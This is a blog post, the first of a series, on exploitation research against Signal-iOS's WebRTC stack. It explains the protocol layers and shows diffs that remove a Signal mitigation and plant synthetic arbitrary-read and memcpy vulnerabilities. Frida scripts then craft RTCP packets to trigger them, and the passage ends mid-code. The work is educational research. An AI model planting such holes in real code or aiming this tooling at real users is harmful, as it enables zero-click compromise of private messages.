You Can't Spell WebRTC without RCE - Part 1 — Margin Research

by Ian Dupont
Jul 19, 2024

Injecting and Exploiting Synthetic Remote Vulnerabilities to explore Signal-iOS and WebRTC

It’s another average Friday morning and my iPhone shows 705 unread Signal messages. Signal has not completely supplanted my use of iMessage, but it does dominate communications with industry peers and privacy-conscious friends. If you are a cybersecurity practitioner reading this, you are probably in the same boat.

The continued growth and popularity of secure messaging apps combined with the ubiquity of phones in our everyday lives means a novel messaging app vulnerability is a serious security concern (consider the Pegasus spyware delivered through WhatsApp and the FORCEDENTRY exploit of iMessage). It is therefore important to increase our attention on messaging app research, including both bug finding and detection, to ensure our security and privacy. But for security researchers unfamiliar with messaging apps and modern mobile operating systems, this is a very tall task. iOS, and Apple research more broadly, can seem like an esoteric target with a lack of “Getting Started” reverse engineering and exploitation guides. Signal is a complex application in its own right, so researching Signal on iOS can quickly become overwhelming.

Such is the motivation for this blog series. Over the next three posts we aim to turn the seemingly arcane and daunting task of instant messaging app research and modern mobile exploitation into a more approachable goal.

We start by investigating WebRTC, a library common in many instant messaging apps, which handles audio and video calling. Though Signal uses its own WebRTC fork, our knowledge gained is still applicable to a variety of other targets. Through this research we choose an interesting location to inject synthetic parsing vulnerabilities and practice interacting with WebRTC protocols using Frida, one of the foremost mobile research tools. We then gain familiarity with the iOS ecosystem and Signal-iOS as we plan an exploitation strategy. By investigating how Signal-iOS manages its database and how iOS maps and links libraries, we learn how to expand the capabilities of our injected primitives. After we align our target, we build a complex ARM64 ROP chain that includes conditional loops and pivoting the stack back and forth to leak the Signal on-device database. Finally, we conclude with an assessment of indicators of compromise (IOCs) to better understand how our exploit could be detected if thrown in the wild.

Simply, this series provides an initial foothold into iOS and Signal research upon which to build further skills. All code referenced in this post is available on Margin Research's WebRCE GitHub page in case you want to follow along or dig deeper into the scripts which form the final exploit.

Our journey is roughly broken into the following topics:

  1. Signal and WebRTC internals
  2. Signal-iOS specifics
  3. Setting up a research environment
  4. Frida
  5. Corellium
  6. iOS app internals
  7. iOS exploitation strategies
  8. ARM64 ROP chains
  9. iOS forensics & IOCs

This first post investigates Signal’s WebRTC library, sets up a local research environment, injects vulnerabilities and demonstrates their reachability. Part two delves deeper into Signal and iOS internals as we turn our primitives into full-fledged remote code execution (RCE). Finally, part three serves as a retrospective by evaluating the exploit from both an offensive and defensive lens.

This research was inspired by Natalie Silvanovich’s work on exploiting Android messaging apps via WebRTC. Like Natalie’s research we target WebRTC to achieve 0-click exploitation on a modern mobile target. However, unlike Natalie’s research, the vulnerabilities leveraged are purely synthetic—there are no 0-days presented here :)

Let’s start by diving into Signal and its internals and injecting some vulnerabilities!

Part 1 - Surveying Signal/WebRTC and Injecting Vulnerabilities

Diving into Signal-iOS and WebRTC

Signal is a large, complex application including platform-specific and native code. When researching such a large application we must narrow our scope; otherwise we could be at this for a long time! To maximize the impact of our research, we will target native application dependencies because of their prevalence across multiple platforms and within other applications. We can easily enumerate native dependencies by investigating Signal-iOS’s Pods. SignalRingRTC jumps out, as it is the real-time communication (RTC) middleware that handles voice and video calling. It proxies traffic to WebRTC, a rather ubiquitous open source C++ library, which directly handles the calls. WebRTC is a great research target because parsing serialized data and maintaining stateful protocols are complex tasks. Furthermore, Natalie’s aforementioned research showed us WebRTC is susceptible to bugs. Time spent understanding its internals will certainly be beneficial, so let’s take a look at RTC handling and how it is integrated within Signal-iOS!

RTC and RTP and RTCP, Oh My!

Brace yourself for a number of (frustratingly similar) protocol acronyms. In a nutshell, we have the following:

Fig. 1: A high level overview of the WebRTC protocol layers. The WebRTC client connects to a remote peer through the ICE protocol. Messages received at the ICE layer are proxied to the DTLS Transport, where they are checked for message type. If DTLS, the DTLS state machine processes the packet until a secret is exchanged between peers. If not, a shared secret was already derived through SDES and the packet is proxied onward. Both branches in this logic arrive at the SRTP layer for decryption using the calculated shared secret. Decrypted packets are checked for packet type and proxied to the corresponding RTP or RTCP handler, accordingly.

RTC is a generic term for real-time communication, not to be confused with RTP: Real-time Transport Protocol. RTP is the underlying protocol for sending communication data, audio or video, from user to user. RTP packets can be thought of as the final data payload between users. RTCP, Real-time Transport Control Protocol, is added functionality on top of RTP. RTCP manages connection information through control packets. Consequently, RTCP data packets are short and have a handful of packet types.

Both RTP and RTCP packets are wrapped by SRTP: Secure Real-time Transport Protocol. SRTP adds encryption, message authentication, and replay protection to RTP/RTCP to increase the security of the stream. One thing to note is that SRTP does not define the computation of a shared secret and thus must receive one from a different layer. The SDES protocol is one option to establish a shared secret.

RTP is a UDP-based protocol and therefore TLS (used for TCP connections) does not apply. However, DTLS, Datagram Transport Layer Security, is implemented in WebRTC to provide session encryption for the UDP stream. DTLS is another option for negotiating a shared secret for SRTP, as defined in RFC 5764.

None of the protocols mentioned above actually connect the peers, which is where Interactive Connectivity Establishment (ICE) comes in. The ICE protocol establishes a session between users and is particularly useful when one or both peers are behind NAT.

Phew! That’s about it. Hopefully it’s clear why WebRTC is such a complicated utility.
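One way to make the layering concrete is to look at how a receiver can tell these protocols apart when they all arrive on the same UDP flow. The sketch below is a simplified model and not WebRTC's code: the first-byte ranges come from RFC 7983, the RTP/RTCP split follows the convention in RFC 5761, and the function name `classifyPacket` and its return strings are made up for illustration.

```javascript
// Simplified first-byte demultiplexer for packets sharing one UDP flow.
// Ranges follow RFC 7983; the RTP vs. RTCP split follows RFC 5761.
// classifyPacket and its return strings are illustrative, not WebRTC names.
function classifyPacket(bytes) {
  if (bytes.length < 2) return "unknown";
  const first = bytes[0];
  if (first <= 3) return "stun";                 // ICE connectivity checks
  if (first >= 20 && first <= 63) return "dtls"; // DTLS records
  if (first >= 128 && first <= 191) {            // RTP/RTCP version bits == 2
    // RTCP packet types occupy 192..223 in the second byte, which is
    // 64..95 once the top bit is masked off.
    const pt = bytes[1] & 0x7f;
    return pt >= 64 && pt < 96 ? "rtcp" : "rtp";
  }
  return "unknown";
}

console.log(classifyPacket(Uint8Array.of(0x8f, 206, 0x00, 0x04))); // RTCP feedback header
console.log(classifyPacket(Uint8Array.of(0x80, 111, 0x00, 0x01))); // RTP, payload type 111
console.log(classifyPacket(Uint8Array.of(0x16, 0xfe, 0xfd)));      // DTLS handshake record
```

Only the unencrypted header bytes are inspected here, which is why this kind of classification can happen before any decryption.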

It is worth noting that Signal maintains a public fork of Google’s WebRTC to work specifically with Signal (via RingRTC). The changes between the repos are noted in the README and we will cover one specific change shortly. It is useful to clone this repo specifically since it is the exact source that Signal fetches during compilation. RingRTC defines its dependent WebRTC version in ringrtc/config/version.properties. The webrtc.version corresponds to a tag ID in the forked WebRTC repo. This research uses RingRTC v2.42.0 and forked WebRTC tag 6261i, and all following links and code snippets reference those versions.

Receiving and Parsing Data

Calling a user starts with ICE negotiations to establish a session. From there, both sides are free to send and receive data over the ICE channel. It is useful to leverage this knowledge to trace the receipt of a packet, allowing us to understand potential 0-click attack surface.

First, the DtlsTransport class receives data at its OnReadPacket function. This function checks whether DTLS is active, and if so it will match the packet type for handling. If DTLS is not active, which it is not by default, the DTLS transport triggers a sigslot signal for the underlying transport to handle.

// webrtc/p2p/base/dtls_transport.cc
void DtlsTransport::OnReadPacket(rtc::PacketTransportInternal* transport,
                                 const char* data,
                                 size_t size,
                                 const int64_t& packet_time_us,
                                 int flags) {
    RTC_DCHECK_RUN_ON(&thread_checker_);
    RTC_DCHECK(transport == ice_transport_);
    RTC_DCHECK(flags == 0);

    if (!dtls_active_) {
        // Not doing DTLS.
        SignalReadPacket(this, data, size, packet_time_us, 0);
        return;
    }

    // ... //
}

As mentioned previously, SRTP requires a shared secret, usually from the DTLS-SRTP or SDES protocol. Signal defaults to SDES and therefore DTLS simply proxies all messages to its underlying SrtpTransport. The SrtpTransport then handles the received packet signal in its inherited OnReadPacket function. Here we see some packet content checks: the packet must have a known type, its size must be reasonable, and RTP/RTCP packets must not be processed “too soon”. If these checks pass, the packet is processed.

// webrtc/pc/rtp_transport.cc
void RtpTransport::OnReadPacket(rtc::PacketTransportInternal* transport,
                                const char* data,
                                size_t len,
                                const int64_t& packet_time_us,
                                int flags) {
    
    // ... //
    
    // Filter out the packet that is neither RTP nor RTCP.
    if (packet_type == cricket::RtpPacketType::kUnknown) {
        return;
    }

    // Protect ourselves against crazy data.
    if (!cricket::IsValidRtpPacketSize(packet_type, len)) {
        RTC_LOG(LS_ERROR) << "Dropping incoming "
            << cricket::RtpPacketTypeToString(packet_type)
            << " packet: wrong size=" << len;
        return;
    }

    // RingRTC change to avoid processing RTP packets too soon
    if (!incoming_rtp_enabled_) {
        if (packet_type == cricket::RtpPacketType::kRtcp) {
            RTC_LOG(LS_INFO) << "Dropping RTCP packet because incoming RTP is disabled; len: " << len;
            return;
        } else {
            RTC_LOG(LS_INFO) << "Dropping RTP packet because incoming RTP is disabled; len: " << len;
            return;
        }
    }

    rtc::CopyOnWriteBuffer packet(data, len);
    if (packet_type == cricket::RtpPacketType::kRtcp) {
        OnRtcpPacketReceived(std::move(packet), packet_time_us);
    } else {
        OnRtpPacketReceived(std::move(packet), packet_time_us);
    }
}

Why does this check exist? We can trace Signal’s inclusion of the incoming_rtp_enabled_ flag to this commit in August 2020, shortly after Natalie’s RTC bug reports and Project Zero blog series. In fact, Signal introduced this patch specifically to detect situations where something “is broken or someone is doing an attack.” This is a logical fix that drastically reduces 0-click surface by refusing to parse any RTP/RTCP data packets prior to both parties accepting a call.

However, it should be noted this is a Signal-specific fix that affects Signal’s RingRTC implementation and its fork of WebRTC. Mainline WebRTC’s RtpTransport class does not have this flag, leaving callees potentially vulnerable to premature RTP parsing before a call is accepted.

In order to learn more about WebRTC and iOS internals, let’s remove the mitigation and reintroduce this 0-click attack surface to see what we can do with some trivial, synthetic primitives!

Removing Mitigations and Injecting Vulnerabilities

We’ll first patch Signal’s message handling code to mimic 0-click parsing in mainline WebRTC and then move on to injecting some parsing vulnerabilities.

To enable 0-click RTP parsing, we need to modify the incoming_rtp_enabled_ check for received RTP packets. This flag is initialized in RingRTC’s Rust FFI code and is set to false for incoming calls. We can either change the enable_incoming bool there to true, or just comment out the check in RtpTransport::OnReadPacket shown above. We’ll opt for the latter.

Now that we have 0-click parsing available, we need some vulnerabilities. As mentioned previously, we are not reporting any Signal 0-days in this post; the point of this series is a crash course in Signal, WebRTC, and iOS research. Let’s leverage Signal-WebRTC’s source code to inject our own vulnerability primitives and keep our research moving!

We need a target transport/handler for our injected vulnerabilities. The lowest layer, RTP/RTCP packet handling, is a nice target since it is where the majority of packet parsing occurs. RTCP control packets are an interesting target as they have a small variety of both protocol and app-defined payload types. RFC 4585 includes some of these application-specific options, including the Payload-specific Feedback Message (packet type 206). The payload data in these packets is variable length, making them a nice choice for some *extended functionality*. In fact, WebRTC’s implementation is rather sparse, including only Receiver Estimated Max Bitrate (REMB) and Loss Notification packets (shown below).

// webrtc/modules/rtp_rtcp/source/rtcp_packet/loss_notification.cc

// Loss Notification
// -----------------
//     0                   1                   2                   3
//     0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
//    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
//    |V=2|P| FMT=15  |   PT=206      |             length            |
//    +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
//  0 |                  SSRC of packet sender                        |
//    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
//  4 |                  SSRC of media source                         |
//    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
//  8 |  Unique identifier 'L' 'N' 'T' 'F'                            |
//    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// 12 | Last Decoded Sequence Number  | Last Received SeqNum Delta  |D|
//    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
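To get a feel for the layout above, here is a minimal sketch that serializes an unmodified Loss Notification packet byte by byte. It is standalone JavaScript, not part of the exploit scripts; the function name `buildLossNotification` and its parameter names are assumptions chosen for illustration. All multi-byte fields are written big-endian, and the 16-bit length field counts 32-bit words minus one.

```javascript
// Serializes the 20-byte Loss Notification packet from the layout above.
// buildLossNotification and its parameter names are illustrative only.
function buildLossNotification({ senderSsrc, mediaSsrc, lastDecoded,
                                 lastReceivedDelta, decodable }) {
  const buf = new ArrayBuffer(20);
  const view = new DataView(buf);        // DataView setters default to big-endian
  view.setUint8(0, (2 << 6) | 15);       // V=2, P=0, FMT=15
  view.setUint8(1, 206);                 // PT=206, payload-specific feedback
  view.setUint16(2, 20 / 4 - 1);         // length in 32-bit words, minus one
  view.setUint32(4, senderSsrc);
  view.setUint32(8, mediaSsrc);
  view.setUint32(12, 0x4c4e5446);        // unique identifier 'L' 'N' 'T' 'F'
  view.setUint16(16, lastDecoded);
  // 15-bit delta followed by the 1-bit decodability flag
  view.setUint16(18, ((lastReceivedDelta & 0x7fff) << 1) | (decodable ? 1 : 0));
  return new Uint8Array(buf);
}

const lntf = buildLossNotification({
  senderSsrc: 0x11223344, mediaSsrc: 0x55667788,
  lastDecoded: 0x0102, lastReceivedDelta: 3, decodable: true,
});
console.log(Array.from(lntf, (b) => b.toString(16).padStart(2, "0")).join(" "));
```

Note that the offsets in the layout comment start at the sender SSRC, so every field sits four bytes later once the RTCP header is included.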

Let’s extend the Loss Notification packets with a read primitive. First, we need some starting point, either an object or library address. We choose to provide ourselves with the address of the current RTCPReceiver object to orient ourselves. Additionally, we include an arbitrary eight-byte read for any requested address. Note that this is not a “safe” dereference, so any requests for unmapped memory result in a crash.

diff --git a/modules/rtp_rtcp/source/rtcp_receiver.cc b/modules/rtp_rtcp/source/rtcp_receiver.cc
index 3c4c073..61e1e1b 100644
--- a/modules/rtp_rtcp/source/rtcp_receiver.cc
+++ b/modules/rtp_rtcp/source/rtcp_receiver.cc
@@ -1117,6 +1125,23 @@ void RTCPReceiver::TriggerCallbacksFromRtcpPacket(
           loss_notification->media_ssrc(), loss_notification->last_decoded(),
           loss_notification->last_received(),
           loss_notification->decodability_flag());
+    } else if (loss_notification->media_ssrc() == 0x4141) {
+      auto sdes = std::make_unique<rtcp::Sdes>();
+      char address[0x20];
+      snprintf(address, 0x20, "%p", this);
+      sdes->AddCName(loss_notification->media_ssrc(), address);
+      std::vector<std::unique_ptr<rtcp::RtcpPacket>> rtcp_packets;
+      rtcp_packets.push_back(std::move(sdes));
+      static_cast<ModuleRtpRtcpImpl2 *>(rtp_rtcp_)->SendCombinedRtcpPacket(std::move(rtcp_packets));
+    } else if (loss_notification->last_decoded() == 0x1337) {
+      unsigned long long ptr = ((unsigned long long)loss_notification->sender_ssrc() << 32) + (unsigned long long)loss_notification->media_ssrc();
+      auto sdes = std::make_unique<rtcp::Sdes>();
+      char address[0x20];
+      snprintf(address, 0x20, "0x%llx", *(unsigned long long*)ptr);
+      sdes->AddCName(loss_notification->media_ssrc(), address);
+      std::vector<std::unique_ptr<rtcp::RtcpPacket>> rtcp_packets;
+      rtcp_packets.push_back(std::move(sdes));
+      static_cast<ModuleRtpRtcpImpl2 *>(rtp_rtcp_)->SendCombinedRtcpPacket(std::move(rtcp_packets));
     }
   }

The patch above gives us the address of the current RTCPReceiver object if we send a Loss Notification packet (packet type = 206, format = 15) with the media SSRC overwritten to 0x4141. If we instead set the last_decoded sequence number to 0x1337 and use a different media SSRC, the program treats the 64 bits in the sender and media SSRCs as an address and sends back the eight bytes stored there. We can have some fun here and return the values as hex strings. Because this is all at the RTCP level, the outgoing packet is encrypted once passed to the SRTP layer!
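The address arithmetic in the patch can be mirrored on the sending side. The sketch below is a hedged illustration in plain JavaScript, with hypothetical helper names `addressToSsrcs` and `parseLeak`: it splits a 64-bit address into the two SSRC values that the patch recombines as `(sender_ssrc << 32) + media_ssrc`, and converts the hex string returned in the CNAME back into a number.

```javascript
// Splits a 64-bit address into the SSRC pair that the injected read primitive
// recombines as (sender_ssrc << 32) + media_ssrc. Helper names are illustrative.
function addressToSsrcs(address) {
  const addr = BigInt.asUintN(64, BigInt(address));
  return {
    senderSsrc: Number(addr >> 32n),        // upper 32 bits
    mediaSsrc: Number(addr & 0xffffffffn),  // lower 32 bits
  };
}

// Converts the CNAME text (a "0x..." hex string) back into a 64-bit value.
function parseLeak(cname) {
  return BigInt(cname);
}

const ssrcs = addressToSsrcs(0x0000000104a3c010n);
console.log(ssrcs.senderSsrc.toString(16), ssrcs.mediaSsrc.toString(16));
console.log(parseLeak("0x104a3c010").toString(16));
```

BigInt is used because JavaScript numbers cannot represent every 64-bit value exactly. One quirk follows from the order of the branches in the patch: an address whose lower 32 bits equal 0x4141 would trigger the object leak instead of the arbitrary read.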

Next, let’s give ourselves an arbitrary write. To make the exploit a bit simpler, we’ll give ourselves an arbitrary memcpy. Again, this implementation is unsafe so the destination plus length must reside in valid memory. We could do this a variety of ways, but for simplicity we will extend the RTCP spec and add a fun new packet type, 222, that triggers a memcpy using data from the packet:

diff --git a/modules/rtp_rtcp/source/rtcp_receiver.cc b/modules/rtp_rtcp/source/rtcp_receiver.cc
index 3c4c073..61e1e1b 100644
--- a/modules/rtp_rtcp/source/rtcp_receiver.cc
+++ b/modules/rtp_rtcp/source/rtcp_receiver.cc
@@ -460,6 +460,14 @@ bool RTCPReceiver::ParseCompoundPacket(rtc::ArrayView<const uint8_t> packet,
             break;
         }
         break;
+      case 222: {
+        const uint8_t* pload = rtcp_block.payload();
+        uint64_t dst = ((uint64_t* )pload)[0];
+        uint32_t len = ((uint32_t* )pload)[2];
+        const uint8_t* src = pload + 0xc;
+        memcpy((void*)dst, (void*)src, (size_t)len);
+        break;
+      }
       default:
         ++num_skipped_packets_;
         break;
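Read from the patch, the payload of a type 222 packet is an eight-byte destination, a four-byte length, and then the bytes to copy. A minimal sketch of building such a packet is shown below. It assumes a little-endian target (the patch reads both fields with host-endian casts, and ARM64 iOS is little-endian), and the name `buildWritePacket` is hypothetical rather than taken from the exploit scripts.

```javascript
// Builds an RTCP packet of the injected type 222.
// Payload layout, per the patch: dst (u64) | len (u32) | bytes to copy.
// Assumes a little-endian target; buildWritePacket is an illustrative name.
function buildWritePacket(dst, data) {
  const unpadded = 4 + 12 + data.length;    // RTCP header + dst/len + data
  const total = (unpadded + 3) & ~3;        // RTCP packets are 32-bit aligned
  const buf = new ArrayBuffer(total);
  const view = new DataView(buf);
  view.setUint8(0, 2 << 6);                 // V=2, P=0, count=0
  view.setUint8(1, 222);                    // the injected packet type
  view.setUint16(2, total / 4 - 1);         // length in words minus one, big-endian
  view.setBigUint64(4, BigInt(dst), true);  // dst, little-endian
  view.setUint32(12, data.length, true);    // len, little-endian
  new Uint8Array(buf).set(data, 16);        // src bytes follow at payload + 0xc
  return new Uint8Array(buf);
}

const wr = buildWritePacket(0x1122334455667788n, Uint8Array.of(0xaa, 0xbb, 0xcc));
console.log(Array.from(wr, (b) => b.toString(16).padStart(2, "0")).join(" "));
```

The copy length is carried separately from the RTCP length field, so the zero padding added for alignment is never copied.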

These are obviously contrived primitives. In reality, we would build up a handful of vulnerabilities into larger primitives to perform the injected behavior; however, for the purpose of brevity and education, these certainly suffice.

Building a Research Environment

At this point we’re ready to set up our research environment and trigger our injected vulnerabilities. We need to build two environments, the target and the thrower.

iOS Target

This research targets Signal-iOS v7.13.0.131.

Signal-iOS is relatively easy to build: simply clone the repo, open in Xcode and build for your target of choice, but this process is not ideal. By default, Signal-iOS fetches RingRTC and WebRTC as stripped shared libraries. This adds significant time to our learning and exploit development, so it is worth figuring out how to keep the symbols.

Signal-iOS’s Makefile has a command to fetch the dependencies, including its RingRTC pod at Pods/SignalRingRTC. This fetches a prebuilt RingRTC binary, which we do not want.

Instead, we can clobber this SignalRingRTC directory with a clone of the open source RingRTC repo and build it ourselves! This repo actually contains a Makefile with build scripts to clone the required WebRTC source repo during compilation. This allows us to patch in our WebRTC primitives defined in the previous section!

TL;DR: RingRTC uses bin/gsync-webrtc to clone the appropriate WebRTC version (from Signal’s forked repo) to src/webrtc. From there, we can inject the vulnerabilities previously discussed. Additionally, we can patch the following build scripts to improve compilation speed and keep symbols to aid our debugging:

  1. Patch RingRTC/bin/build-ios for HOST_SIM_ONLY=yes because, for the time being, the Xcode iOS simulator is good enough to test and trigger our bugs. Also comment out the commands which remove debug information from the output.
  2. Patch webrtc/src/ to include the vulnerabilities outlined in the Removing Mitigations and Injecting Vulnerabilities section

These patches are included in our research repo as ringrtc_make.diff and webrtc.diff. If we now run make ios from the RingRTC root directory, Xcode will link in our custom RingRTC and WebRTC libraries, with symbols!

A turn-key make build-ios-debug command, available in our repo, performs all the tasks outlined in this section. All that is required is to clone Chromium’s depot tools and set the DEPOT_TOOLS environment variable to its path. Then, run the make build-ios-debug command, wait for compilation to finish, open the project in Xcode, run the app in the iOS simulator, and register your victim!

Android Thrower

We now need a throwing device to trigger the vulnerabilities and, eventually, send our RCE payloads. We have options here, but choosing a Signal-Android build and intercepting relevant RTCP functions with Frida is the easiest choice.

Building a thrower from scratch would be extremely tedious and require implementing a chunk of the aforementioned protocols. Using an iOS build with Frida is a decent option; however, as of this blog post, Frida is unable to hook macOS apps on Sonoma.

We want debug symbols so Frida can hook incoming and outgoing RTC functions. However, like Signal-iOS, Signal-Android strips shared libraries. Again we add our own compiled libraries to avoid fetching prebuilt ones. On a Linux machine, we can compile the RingRTC libraries with our own configuration and then copy them into Signal-Android/app/src/main/jniLibs/. The patches to avoid stripping symbols include:

  1. Ensuring Signal-Android does not strip shared libraries by adding packaging.jniLibs.keepDebugSymbols.add("**/*.so") to its build.gradle.kts file
  2. Changing RingRTC to build only ARM64 to speed up compilation
  3. Adding --unstripped to the build-aar command in RingRTC’s Makefile

These patches are included in our research repo as signal_android.diff and ringrtc_android.diff. We can then run make android to build our own RingRTC and WebRTC. Then, use Signal-Android’s reproducible docker build to compile the app and link in the pre-compiled shared libraries!

A turn-key make build-android-debug command, available in our repo, performs all the tasks outlined in this section. It also fetches the Android SDK tools and signs the output APK with a generic key (signing is not required if installing into a non-production AVD). All that is required is to clone Chromium’s depot tools and set the DEPOT_TOOLS environment variable to its path.

We can use any non-Play Store Android device created in Android Studio, or we can root a production release AVD using a tool like rootAVD. We also need Frida, which offers precompiled Android ARM64 binaries on its release page. Note: we want frida-server here.

Download and extract Frida, boot the Android AVD, and load Frida onto the device with the following commands:

$ adb push ~/Downloads/frida-server-16.3.3-android-arm64 "/data/local/tmp/"
$ adb root
$ adb shell
$ /data/local/tmp/frida-server-16.3.3-android-arm64 &

# in another terminal
$ frida-ls-devices
Id                         Type    Name                        OS              
-------------------------  ------  --------------------------  ----------------
emulator-5554              usb     Android Emulator 5554       Android 14          

All that is left to do is drag and drop the compiled APK onto the device and register a user. Now we’re ready to throw some payloads!

Triggering the Vulnerabilities

We chose Signal-Android as our thrower instead of a bespoke solution because we can easily hook RTP functions and manipulate outgoing data. Let’s break these hooks into two parts: starting the call and throwing the exploit.

Starting the Call

We want to automate the actions a user performs to make a Signal call including:

  1. Scrolling through conversations to find the callee’s conversation
  2. Selecting the conversation
  3. Pressing either the video or voice call button
  4. Pressing “Start Call”

Frida has a slick Android API and we can leverage Signal’s Java code to interface with the Signal database and UI. For instance, the following code fetches the conversation for a target phone number (a conversation with that user must be in the database or the script will fail):

/*
 *  @description: finds the desired contact conversation in the database and
 *  brings up the conversation
 */
function GetConvo() {
	Java.perform(function () {
		var SignalDatabase = Java.use("org.thoughtcrime.securesms.database.SignalDatabase");
		var Recipient = Java.use("org.thoughtcrime.securesms.recipients.Recipient");

		var targetId = SignalDatabase.recipients().getOrInsertFromE164(target_e164);
		var target = Recipient.resolved(targetId);
		var threadId = SignalDatabase.threads().getOrCreateThreadIdFor(target);

		Java.choose("org.thoughtcrime.securesms.conversationlist.ConversationListFragment", {
			onMatch: function(instance) {
				instance.getNavigator().goToConversation(targetId, threadId, 2, -1);
			},
			onComplete: function () { setTimeout(VideoCall, 2000) }
		});
	});
}

We then use that conversation to start a video call and “click” the “Start Call” button using the available activities.

The code to perform this is included in a standalone JavaScript file, call.js.

Sending Modified RTCP Messages

This objective is a bit more tricky, because we need to hook in-call methods and modify outgoing data. First, we should establish our goal. We need to send two different types of messages in our exploit:

  1. Hit the read with a modified Loss Notification packet
  2. Hit the write with a type 222 RTCP packet that includes a (potentially) very long payload

We’ll approach each in a different way for the sake of experimentation.

Requesting and Retrieving a Leak

Loss Notification packets, especially for our purposes, are not very long. In fact, all the relevant triggers (sender and media SSRC, last decoded sequence number) are in the first 0x10 bytes (0x14 bytes with RTCP header). We can therefore clobber outgoing messages if they are long enough. Hooking outgoing SRTP functions shows that SDES messages, which share CNAME and other user metadata, are sent frequently during the initial connection. They seem pretty innocuous and are likely always longer than 0x10 bytes because of the included SSRC and CNAME.

If you’re observant, you may have noticed the read vulnerability creates and queues a new SDES packet to leak the data. In this case we have control over how the leak occurs because we patched the code; however, in real life we would want to leak information within expected packet types. Leaking data via an unexpected or obscure packet type early in a connection could raise a red flag.

Hooking the Sdes::Create function, we retrieve the buffer from the first argument and modify it in memory before sending:

/*
 * @description: accepts an input buffer and modifies the packet to create a
 * LossNotification packet (fmt=15, type=206). Note that the buffer provided
 * must be at least 0x14 bytes and its length at the time of sending should
 * be adjusted accordingly
 * @arguments:
 *  mbuf: a ptr to a buffer in memory. Must be at least 0x14 bytes long
 *  sender_ssrc: the 32-bit SSRC to put in the Sender SSRC field. Used as the
 *   upper 32-bits of an arbitrary address. This field should be sent in
 *   big-endian. If null, the existing SSRC is kept in the buffer
 *  media_ssrc: the 32-bit SSRC to put in the Media SSRC field. Used to leak
 *   the WebRTC RTCPReceiver object (0x4141) as well as
 *   the lower 32-bits of an arbitrary address. This field should be sent in
 *   big-endian. Cannot be null.
 */
function writeLossNotification(mbuf, sender_ssrc, media_ssrc) {
    /* RTCP header */
    var fmt = 15; /* Loss Notification format type */
    /* version + has_padding + count_or_format_ */
    mbuf.add(0x00).writeU8((2<<6) + (0<<5) + (fmt & 0x1f));
    mbuf.add(0x01).writeU8(206);   // kPacketType
    mbuf.add(0x03).writeU8(0x04);  // low byte of the big-endian length: (0x14-byte packet / 4) - 1

    /* if requesting an arbitrary address, set the Sender SSRC value */
    if (sender_ssrc != null) {
        var be = Le32ToBe32(sender_ssrc);
        mbuf.add(0x04).writeU32(be);
    }
    /* Set the Media SSRC. Cannot be null */
    if (media_ssrc == null) {
        send({"key": "error",
              "str": "media_ssrc in writeLossNotification cannot be null"});
        return;
    }
    var be = Le32ToBe32(media_ssrc);
    mbuf.add(0x08).writeU32(be);

    /*
     * set the target SSRC for the returned packet. This is matched during
     * parsing so that the leak can be successfully communicated back to the
     * driver
     */
    targetSsrc = be;

    /*
     * unique identifier must match the expected value otherwise the packet
     * will be discarded
     */
    mbuf.add(0x0c).writeU32(0x46544E4C);

    /*
     * indicate an address is embedded in the SSRCs for an arb read request.
     */
    mbuf.add(0x10).writeU16(0x3713);

    /*
     * write a hardcoded value for last_received_delta_and_decoded - not used
     * in the leak primitive
     */
    mbuf.add(0x12).writeU16(0x4444);

    if (debug) {
        send({"key": "debug", "function": "Assembled Loss Notification packet",
              "data": hexdump(mbuf, { length: 0x14 })});
    }
}

Great! This function accepts an address (broken into two 32-bit SSRCs) and modifies an outgoing packet to request a leak. Now, we need to handle the receipt of a leak. As you might have guessed, we hook RTCPReceiver::IncomingPacket (the function it calls, ParseCompoundPacket, would also suffice) and parse the packet ourselves if it is an incoming SDES message. If the returned SSRC matches our previously requested address, we know the CNAME field contains the value at that address.

/*
 * @description: parses an SDES message received from the target. Checks if the
 *  media SSRC matches a previously requested value. If so, it communicates the
 *  leaked address back to the driver.
 * @arguments:
 *   packet: a pointer to a packet of length `length`
 *   length: the length of the `packet`
 */
function parseSDES(packet, length) {
    var ssrc = packet.readU32();

    if (debug) {
        send({"key": "debug", "function": "RTCPReceiver::IncomingPacket",
              "data": "Received SDES packet with Sender SSRC: " +
              ssrc.toString(16) + "\n" + hexdump(packet, { length: length })});
    }

    /* If the target SSRC does not match the one received, then bail */
    if (ssrc != targetSsrc) { return }

    /*
     * if the target SSRC matches, parse the packet for a leak and communicate
     * the target SSRC and leaked value back to the driver. Reset globals and
     * await the next request
     */
    var leak = getLeakedAddress(packet, length);
    if (leak) {
        send({"key": "LeakedAddr", "val": leak, "lower32": Le32ToBe32(ssrc)});
        targetSsrc = null;
        toSendLower = null;
        toSendUpper = null;
    }
}

/*
 * @description: get a leaked address from a returned SDES packet. The leak
 *  should be in the CNAME field (6 bytes into the packet) and should be in hex
 *  ASCII text
 * @arguments:
 *   packet: a pointer to a packet of length `length`
 *   length: the length of the `packet`
 * @reutrn: an UInt64 with the leaked address or `null` if the parsing failed
 */
function getLeakedAddress(packet, length) {
    var addr = "";
    var idx = 6;
    /* stop at the NUL terminator or the end of the packet, whichever is first */
    while (idx < length) {
        let char = packet.add(idx++).readU8();
        if (char == 0) { break; }
        addr += String.fromCharCode(char);
    }
    try {
        var leak = new UInt64(addr);
        return leak;
    } catch (error) {
        console.log("Error getting leak");
        return null;
    }
}
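
To sanity-check the parsing logic away from a device, here is a minimal Python sketch of the same round trip. It assumes the layout the hook above relies on (a 4-byte SSRC read in little-endian order, a 1-byte item type, a 1-byte item length, then NUL-terminated hex text from offset 6). The helper names `split_address`, `swap32`, and `parse_sdes_leak` are hypothetical and not part of our repo; `swap32` only guesses at what `Le32ToBe32` does from its name.

```python
import struct


def split_address(address):
    """Split a 64-bit address into (upper, lower) 32-bit halves."""
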